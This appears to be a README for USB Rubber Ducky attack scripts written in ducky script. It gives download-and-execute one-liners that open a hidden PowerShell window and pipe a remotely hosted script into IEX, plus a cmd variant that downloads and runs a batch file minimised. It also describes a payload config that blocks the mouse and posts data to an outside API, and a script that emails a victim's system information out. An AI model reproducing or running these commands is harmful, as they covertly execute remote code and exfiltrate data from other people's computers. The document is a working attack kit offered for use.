A few scripts for the USB rubber ducky from HAK5. The scripts are written in ducky script.
_ _ _ USB _ _ _
__(.)< __(.)> __(.)= Rubber >(.)__ <(.)__ =(.)__
\___) \___) \___) Ducky! (___/ (___/ (___/
Note! Your powershell Script file must be publicly hosted on the web and is by definition not secure. Be aware that you do not put sensitive or personal data inside the powershell script.
This Rubber Ducky Script executes a custom powershell script that is hosted online. Host the powershellScript.txt
or a custom script online and change the locatin in ExeWebScript.duck
to that hosted script.
The ExeWebScript.duck
opens the RUN box ([WINDOWS] + R), and opens a hidden powershell. powershell -windowstyle hidden
In powershell it uses IEX to execute plain text from wget. Examples:
# shortest
iwr www.yourSite.com/powershellScript.txt|iex
# alternative
iex (wget www.yourSite.com/powershellScript.txt)
With the AlternativeExeWebScript.duck
it first opens cmd instead of powershell and executes the next line of code:
(powershell -Command "& {Invoke-WebRequest -Uri www.yourSite.com/powershellScript.txt -OutFile a.bat}") & start /min a.bat & exit
The powershellScript.txt is just as an example of what some 'harmless' things that you could do.
It comes with a config for some options.
$MinimizeWindows = $True;
$ShowPopUp = $False;
$OpenWebPage = $True;
$urlNAV = "www.yourWebsite.com/PageToDisplay";
$OpenInFullScreen = $True;
$SendPostToAPI = $True;
$urlAPI = "www.yourWebsite.com/PostAPI";
$BlockMouse = $True;
$BlockedTimeSeconds = 8;
$SpeakText = $True;
$TextToSpeak = "Hi. This is a Rubber Ducky";
Note! Your password and emailadress wil be typed in plain text on the victim's computer
This script sends the system information from a victim's computer to a specified e-mail address.